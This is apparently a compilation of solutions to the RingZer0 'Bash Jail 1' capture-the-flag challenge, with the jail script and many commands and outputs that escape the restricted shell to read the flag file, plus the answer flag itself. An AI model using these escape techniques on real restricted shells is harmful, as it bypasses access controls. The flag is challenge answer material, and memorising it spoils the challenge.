平台 :
ringzer0team : https://ringzer0team.com
题目简介 :
Bash Jail 1
RingZer0 Team Online CTF
BASH Jail Level 1:
Current user is uid=1000(level1) gid=1000(level1) groups=1000(level1)
Flag is located at /home/level1/flag.txt
Challenge bash code:
-----------------------------
while :
do
echo "Your input:"
read input
output=`$input`
done
-----------------------------
Your input:
解法汇总 :
Your input:
bash flag.txt
flag.txt: line 1: FLAG-U96l4k6m72a051GgE5EN0rA85499172K: command not found
Your input:
dd if=/home/level1/flag.txt of=/dev/tty
FLAG-U96l4k6m72a051GgE5EN0rA85499172K
0+1 records in
0+1 records out
38 bytes (38 B) copied, 0.0010536 s, 36.1 kB/s
Your input:
bash
level1@lxc17-bash-jail:~$ cat flag.txt 1>&2
FLAG-U96l4k6m72a051GgE5EN0rA85499172K
level1@lxc17-bash-jail:~$
Your input:
bash
level1@lxc17-bash-jail:~$ cat flag.txt > /dev/tty
FLAG-U96l4k6m72a051GgE5EN0rA85499172K
Your input:
eval cat /home/level1/flag.txt >&2
FLAG-U96l4k6m72a051GgE5EN0rA85499172K
Your input:
bash -x prompt.sh
+ echo
+ echo -e '\033[0;34mRingZer0 Team Online CTF\033[0m'
+ echo
+ echo 'BASH Jail Level 1:'
++ id
+ echo 'Current user is uid=1000(level1) gid=1000(level1) groups=1000(level1)'
+ echo
++ pwd
+ echo 'Flag is located at /home/level1/flag.txt'
+ echo
+ echo 'Challenge bash code:'
+ echo -----------------------------
+ echo -e '\033[0;31m'
+ sed -e 1,19d
+ echo -e '\033[0m'
+ echo -----------------------------
+ :
+ echo 'Your input:'
+ read input
cat flag.txt
++ cat flag.txt
+ output=FLAG-U96l4k6m72a051GgE5EN0rA85499172K
+ :
+ echo 'Your input:'
+ read input
Your input:
bash
level1@lxc17-bash-jail:~$ cat flag.txt >&0
FLAG-U96l4k6m72a051GgE5EN0rA85499172K
Your input:
bash
level1@lxc17-bash-jail:~$ awk '{system("wc "$1)}' /home/level1/flag.txt
wc: FLAG-U96l4k6m72a051GgE5EN0rA85499172K: No such file or directory
Your input:
bash
level1@lxc17-bash-jail:~$ cat `cat flag.txt`
cat: FLAG-U96l4k6m72a051GgE5EN0rA85499172K: No such file or directory
Your input:
bash
level1@lxc17-bash-jail:~$ PS1=$(cat flag.txt)
FLAG-U96l4k6m72a051GgE5EN0rA85499172KA
Your input:
bash
level1@lxc17-bash-jail:~$ arp -f -v /home/level1/flag.txt
>> FLAG-U96l4k6m72a051GgE5EN0rA85499172K
arp: format error on line 1 of etherfile /home/level1/flag.txt !
Your input:
eval $(vi /home/level1/flag.txt < `tty` > `tty`)
Your input:
eval `cat /home/level1/flag.txt`
/home/level1/prompt.sh: line 24: FLAG-U96l4k6m72a051GgE5EN0rA85499172K: command not found
Your input:
bash
level1@lxc17-bash-jail:~$ (>&2 grep [a-zA-Z] flag.txt)
FLAG-U96l4k6m72a051GgE5EN0rA85499172K
Your input:
python
Python 2.7.6 (default, Jun 22 2015, 17:58:13)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import sys
>>> sys.stdout = sys.stderr
>>> with open("flag.txt", "r") as f:
... print f.read()
...
FLAG-U96l4k6m72a051GgE5EN0rA85499172K
>>>
Your input:
. /home/level1/flag.txt
/home/level1/flag.txt: line 1: FLAG-U96l4k6m72a051GgE5EN0rA85499172K: command not found
Your input:
source /home/level1/flag.txt
/home/level1/flag.txt: line 1: FLAG-U96l4k6m72a051GgE5EN0rA85499172K: command not found
Your input:
bash
level1@lxc17-bash-jail:~$ bash >&2
level1@lxc17-bash-jail:~$ cat /home/level1/flag.txt
FLAG-U96l4k6m72a051GgE5EN0rA85499172K: command not found
Your input:
bash
level1@lxc17-bash-jail:~$ $(cat /home/level1/flag.txt)
bash: FLAG-U96l4k6m72a051GgE5EN0rA85499172K: command not found
Your input:
sh
sh-4.3$ cat flag.txt >&3
FLAG-U96l4k6m72a051GgE5EN0rA85499172K
Your input:
bash
level1@lxc17-bash-jail:~$ a'|'"ls -la $SHELL;`cat $HOME/flag.txt`"
bash: a|ls -la /home/level1/prompt.sh;FLAG-U96l4k6m72a051GgE5EN0rA85499172K: No such file or directory
Your input:
python flag.txt
Traceback (most recent call last):
File "flag.txt", line 1, in <module>
FLAG-U96l4k6m72a051GgE5EN0rA85499172K
NameError: name 'FLAG' is not defined
Your input:
bash
level1@lxc17-bash-jail:~$ `ls`
bash: flag.txt: command not found
level1@lxc17-bash-jail:~$ `cat flag.txt`
bash: FLAG-U96l4k6m72a051GgE5EN0rA85499172K: command not found
Your input:
eval "$(cat flag.txt)"
/home/level1/prompt.sh: line 24: FLAG-U96l4k6m72a051GgE5EN0rA85499172K: command not found
网友评论